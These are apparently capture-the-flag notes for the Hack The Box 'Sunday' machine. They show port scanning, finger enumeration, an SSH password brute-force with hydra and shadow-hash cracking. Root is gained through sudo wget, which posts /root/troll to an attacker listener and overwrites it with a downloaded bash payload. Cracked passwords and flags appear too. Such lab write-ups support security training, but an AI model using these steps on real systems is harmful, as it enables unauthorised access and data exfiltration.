[HTB Notes] Sunday

1. Check open ports
nmap --min-rate 1000 -p- -v 10.10.10.76
# 79/tcp    open  finger
# 111/tcp   open  rpcbind
# 22022/tcp open  unknown
nmap -oN sunday.nmap -p79,111,22022 -sC -sV -v 10.10.10.76
# 79/tcp    open  finger  Sun Solaris fingerd
# | finger: 
# | Login    Name      TTY       Idle    When       Where\x0D
# | sunny    sunny     pts/2     13      Fri 07:17  10.10.15.75\x0D
# |_sammy    sammy     pts/3             Fri 07:30  10.10.15.75\x0D
# 111/tcp   open  rpcbind 2-4 (RPC #100000)
# 22022/tcp open  ssh     SunSSH 1.3 (protocol 2.0)
# | ssh-hostkey:
# |   1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
# |_  1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
#

2. Enumerate on port 79
finger -l @10.10.10.76
# Login name: sunny                 In real life: sunny
# Directory: /export/home/sunny     Shell: /bin/bash
# On since Oct 12 07:17:29 on pts/2 from 10.10.15.75
# 24 minutes Idle Time
# No unread mail
# No Plan.
#
# Login name: sammy                 In real life: sammy
# Directory: /export/home/sammy     Shell: /bin/bash
# On since Oct 12 07:30:08 on pts/3 from 10.10.15.75
# 5 minutes 58 seconds Idle Time
# No unread mail
# No Plan.

3. Generate shell as User (sunny)
[x] Bruteforce password using hydra
hydra -P /usr/share/wordlists/rockyou.txt -l sunny -s 22022 10.10.10.76 -t 8 ssh
# [22022][ssh] host: 10.10.10.76   login: sunny   password: sunday
[x] Login as sunny via SSH
ssh -l sunny -p 22022 10.10.10.76
# no matching key exchange method found. 
# Their offer: gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
# 
ssh -l sunny -oKexAlgorithms=+diffie-hellman-group1-sha1 -p 22022 10.10.10.76
# Password: sunday
[x] While inside shell:
ls -la /
# drwxr-xr-x  2 root root   4 2018-04-15 20:44 backup
#
ls -la /backup
# -rw-r--r--  1 root root 319 2018-04-15 20:44 shadow.backup
#
cat /backup/shadow.backup
# sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
# sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
#
sudo -l
# (root) NOPASSWD: /root/troll
#
sudo /root/troll
# testing
# uid=0(root) gid=0(root)

4. Change user (sunny -> sammy)
[x] Crack password hash from shadow.backup
curl --data "hashid=\$5\$Ebkn8jlK\$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB" https://hashc.co.uk/hashid | grep mode:
# [+] sha256crypt $5$, SHA256(Unix)
# (hashcat mode: 7400)
#
hashcat --force -m 7400 \$5\$Ebkn8jlK\$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB /usr/share/wordlists/rockyou.txt
# Status...........: Cracked
# Hash.Type........: sha256crypt $5$, SHA256 (Unix)
# Hash.Target......: $5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB
# cooldude!
[x] Login as sammy via SSH
ssh -l sammy -oKexAlgorithms=+diffie-hellman-group1-sha1 -p 22022 10.10.10.76
# Password: cooldude!
[x] While inside shell:
find / -name "user.txt" 2> /dev/null
# /export/home/sammy/Desktop/user.txt
#
cat /export/home/sammy/Desktop/user.txt
# a3d9498027ca5187ba1793943ee8a598
#
sudo -l
# (root) NOPASSWD: /usr/bin/wget

5. Attempt Privilege Escalation (sunny + sammy -> root)
[x] Extract /root/troll file
[x] Set-up netcat listener outside of user shell
nc -lvp 4444
# Listening on [0.0.0.0] (family 0, port 4444)
[x] Go back to user (sammy) shell
sudo wget --post-file=/root/troll HTB_IPv4:4444
# HTTP request sent, awaiting response...
[x] View contents of /root/troll in netcat listener
#!/usr/bin/bash

/usr/bin/echo "testing"
/usr/bin/id
[x] Upload and replace /root/troll
[x] Generate your own payload
#!/usr/bin/bash

/bin/bash
[x] Set-up HTTP Server
python -m SimpleHTTPServer
# Serving HTTP on 0.0.0.0 port 8000 ...
[x] Inside user (sammy) shell:
sudo wget HTB_IPv4:8000/troll -O /root/troll; cat
[x] Inside user (sunny) shell:
sudo /root/troll
[x] Inside root shell:
find / -name root.txt
# /root/root.txt
#
cat /root/root.txt
# fb40fab61d99d37536daeec0d97af9b8